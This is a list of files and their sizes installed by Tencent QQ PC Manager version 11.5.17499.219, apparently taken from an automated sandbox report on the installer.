%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOKernelEx.sys (2496 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTrojanPlugin\QMTrojanPlugin.dll (10652 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_479.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibexcept.xml (16 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\libexpatw.dll (1184 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSuperScan.EXE (1810 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\GameUpgradeTrayPlugin\GameUpgradeTrayPlugin.dll (3518 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\config\NetworkFixInfo.xml (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1405.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\Common.dll (20906 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOBusinessCfgV2.etf (617 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\smanalyplugin\SMAnalyPlugin.dll (9480 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FileUnlock.dll (33 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1015.dat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Images\logodef.ico (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\GFCustom.dll (10350 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_109.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMEmKit.dll (1889 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPIEStartPage\QMTPIEStartPage.dll (7706 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\DeskUpdate\GlobalMgr.db (190 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\dlcore.dll (17399 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\DownloaderMgrUI\DownloaderMgrUI.dll (6276 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSwitchesMgrPlugin\QMSwitchesMgrPlugin.dll (776 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMDlder.dll (3807 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\bugreport_xf.exe (3814 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FastUninstScpt.etf (95 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\libjpegturbo.dll (2625 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAssocScan.dll (3412 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FileMon\x64\TFsFltX64.sys (953 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\xGraphic32.dll (1610 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAdBlock.dat (696 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAdBlock.rdb (1704 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1104.dat (454 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMContextUninstall.dll (715 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAssocScanLib.dat (782 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftGroup.etf (90 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\xImage.dll (2088 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ScUrConfig.dat (17 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\DlForQd.dll (3350 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\QQPCNetFlow.rdb (6308 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1605.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\More.png (448 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCXPNOTIFY.rdb (1719 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibcss.xml (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\RemoteAssistance.png (720 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysOptimize\QMTraceClear.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_663.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tsskx64.sys (54 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSccTrayPlugin\QMSccTrayPlugin.tpc (686 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1028.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\tpk.ini (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10483.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\libexpatw.dll (1195 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\HPScannerPlugin\hpswscanplugin\HPSWScanPlugin.dll (3480 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\RtpPage\RtpPage.dll (2928 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TsFltMgr.sys (1770 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_2000.dat (597 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\HPScanUIPlugin\HPScanUIPlugin.tpc (711 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSVulPage.dll (11307 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TsNetMonWfp64.sys (559 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMMobileSettingCenter\QMMobileSettingCenter.tpc (711 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.CRT\msvcp80.dll (6658 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMVulPlugin\QMVulPlugin.dll (3722 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\AVEngine.ini (31 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\zlib.dll (145 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPKTrayPlugin\QMTpkTrayPlugin.rdb (50 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\NewPlugin.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\libpng.dll (1843 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\DownloaderInfo.dll (7875 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmudiskmgr\QMUDiskMgr.dll (10358 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCEntrancePlugin\QMSCEntrancePlugin.rdb (28 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ProcessManager.dll (3261 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSpecTips\QMSpecTips.dll (3119 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMMobileTrayPlugin\QMConnectTipsConfig.dat (520 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1227.dat (1 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\WechatBackup\UserIco\Circle71.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOClient.dll (2383 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMAdBlock.png (653 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\CommonDef.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Images\MyPhone.ico (292 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QQPCSoftMgr.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMQQLoginPlugin\QMQQLoginPlugin.dll (8515 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCGeneralPlugin\QMSCGeneralPlugin.tpc (723 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCClinic.exe (9760 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_565.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\libexpatw.dll (1879 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCBTU.exe (577 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1003.dat (6 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_127.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\UninstNetWork.dll (46 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\TencentNews.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMEmDrv.sys (49 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSysOptimizeAssist\QMProcessRunningTime.dll (1176 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCRTP.exe (3557 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMHardwareDetectPlugin\Config\videocardmark.etf (17 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\sysspeeduprtpplugin\SysSpeedupRtpPlugin.dll (46 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMRouterPlugin.png (722 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1093.dat (454 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\pluginctrl.xml (31 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QQPCB2AndroidJmp_QO.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\tencentdl.exe (7433 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\NodisturbOGList.etf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virscr05.def (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMBJTrayPlugin\QMBJTrayPlugin.tpc (818 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\MobileSoftMgr.dll (126 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\xImage.dll (2243 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TsNetMon.sys (47 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMMobileTrayPlugin\QMMobileTrayPlugin.dll (6138 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_116.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10001.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSafeBoxHelperDll.dll (1222 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibblackac.xml (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMBluescreenFixer\bugreport.exe (5919 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\QMRealTimeSpeedupSkinCenter\QMRealTimeSpeedupSkinCenter.zip (601 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMDnsPlugin.png (409 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQRepair.exe (1097 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QuickOpenLogo\QQPCLeakScan_QO.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1101.dat (446 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.ATL\Microsoft.VC80.ATL.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\qmsxtboxplugin.png (822 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPKTrayPlugin\QMTpkTrayPlugin.tpc (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\arkGraphic.dll (3995 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FtSysCommonMgrGF.rdb (68 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCFileOpen.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\jgImage.dll (164 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1010.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\zlib.dll (1174 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCVulPlugin\QMSCVulPlugin.tpc (707 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\SpeedupMsg.dll (3960 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCfix.dll (8576 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSXTrayPlugin\QMSXTrayPlugin.dll (3615 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1230.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\RefuseInjectShell.DAT (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_890.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMPerfCtrl\QMPerf.dll (2701 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\Common.dll (15539 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSoftGame.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTipsConfig.dat (9 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMAssocScanLib2.dat (53 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virscr02.def (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\RtpPage\RtpPage.png (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\Microsoft.VC80.ATL\Microsoft.VC80.ATL.cat (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\zlib.dll (1033 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1408.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_123.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\CubeConfig.ini (108 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMMain.dll (17622 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\data\polyphone.dat (12 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRtpController.dll (1506 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\libjpegturbo.dll (3301 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCHelper.sys (34 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_862.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMHwFloatWnd\QMHwFloatWnd.rdb (130 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMSysOptimizeAssist\QMSysOptimizeAssist.tpc (715 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOServicePlugin.etf (545 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\FileOpen.etf (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMClinicsettingcenter\QMClinicSettingCenter.dll (4116 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\arkGraphic.dll (3659 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgrWList.etf (633 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GlobalConfig.etf (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\jgImage.dll (440 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCLaunch.exe (30 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmrtpplugin\QMRtpPlugin.rdb (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\QMInsys.sys (1940 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMSysRepLibRisk.dat (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1108.dat (455 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysCleanPage\SysCleanPage.dll (6848 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMWlanMacDll.dll (4140 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTencentNews.rdb (212 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\SubPlugins\GameSpeedupTipsMgr.dll (5348 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCFIXATDLL.DLL (9258 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCWSCController.exe (1795 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1027.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMStartupMonitorNotify\QMStartupMonitorNotify.dll (3417 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1818.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOBase.dll (2212 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\zlib.dll (1718 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\libpng.dll (928 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SpeedupNetflowLimit.etf (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMTPIEStartPage\QMTPIEStartPage.rdb (99 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\tpkproxy.dll (2663 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1300.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\GF.dll (17695 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAOKernelEx64.sys (718 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMContextScan64.dll (766 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_10485.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\QQPCMgrUpdate.dat (656 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\sm01.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1629.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_129.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\qqpcmgr.dat (712 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftMgr\jgImage.dll (131 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMFileMonCyber.dat (718 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMClinicsettingcenter\QMClinicSettingCenter.tpc (747 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysCleanPage\SysCleanPage.rdb (137 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMGameAssistantPlugin\QMGameAssistantPlugin.tpc (845 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMUpdate\bugreport.exe (5441 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAVDescr.ipt (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_2016.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMAutoTaskPlugin\QMAutoTaskPlugin.dll (10011 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibexceptac.xml (27 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\IEStartPageConfig.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\searchlist.dat (990 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\SysSpeedUp\SysSpeedUp.rdb (68 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\crc.dat (410596 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tpk\1.0.0.1\def\virscr03.def (14 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMGameAcceleratePlugin\QMGameAcceleratePlugin.rdb (228 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCSysOptimize.rdb (255 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\AGEConfig.etf (4 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\WechatBackup\UserIco\FaceMask57.png (530 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\AdBlock\AdBlockConf.dat (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QQPCWifiSafe\QQPCCommonMgr.rdb (15021 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\QQPCMgrInstall_20160519101428.Log (25356 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMNewsTips\QMNewsTips.dll (5962 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMInjectUtils.dll (1008 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQRepair.dat (656 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAVEng.dll (7460 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1087.dat (447 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SoftAAL.sys (784 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMInterfaceExe.exe (156 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMRecommender.dll (5298 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1601.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\SysOptLib.dat (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\router_config.xml (55 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\GF.dll (17445 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\adfilterlib\tsadlibpw.xml (960 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\pic\sCheck_Wireless.png (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TAO\DZSConfig.etf (4 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMInterface.dll (679 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCClinicHelper64.exe (378 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\ClassicLogo\QMNetSpeedTest.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_642.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGCScriptApi.dll (4001 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\TimingTaskParam.xml (413 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMNetMon\xGraphic32.dll (1204 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\qmcloudinter\QMCloudInter.dll (6150 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmrtpplugin\QMRTPTipsConfig.dat (10 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_1105.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMLDPatch.dll (399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\bugreport.exe (3465 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\QMStartupMonitorNotify\QMStartupMonitorNotify.rdb (86 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\GameSpeedupExposure\GameSpeedupExposure.tpc (953 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\tscpm64.sys (310 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\tinyxml.dll (1828 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_579.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSSafeEdit.dat (110 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\malware\logo\plugin_587.png (2 bytes)
%Documents and Settings%\All Users\Application Data\Tencent\TSVulFw_Cache\tsvulinfocrp.db (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\GameSpeedupExposure\GameSpeedupExposure.rdb (1850 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMArpMgr\Common.dll (16793 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\FileSmash\libjpegturbo.dll (4138 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1017.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\GameSpeedupAppPlugins\QMHardwareDetectPlugin\QMHardwareDetectPlugin.rdb (123 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\StartupMgr\StartupMgr.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\TSWebShieldX64.dat (3675 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMTrayPlugin\qmavtrayplugin\QMAVTrayPlugin.dll (7069 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\QMSCVulPlugin\QMSCVulPlugin.dll (2480 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCConfigCatalog.xml (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\plugins\IEStartPage\TPBrowser.dat (983 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~8cd2c\AMD64.Microsoft.VC80.CRT\msvcp80.dll (7937 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QQPCUpdateAVLib.exe (1465 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\UninstallTips.exe (3063 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\StartupMgrDll.dll (5057 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ScenePackage.dat (8 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\Image\TPBackImage.png (43 bytes)
%Program Files%\Tencent\QQPCMgr\11.5.17499.219\ClinicData\script\pb_1018.dat (1 bytes)
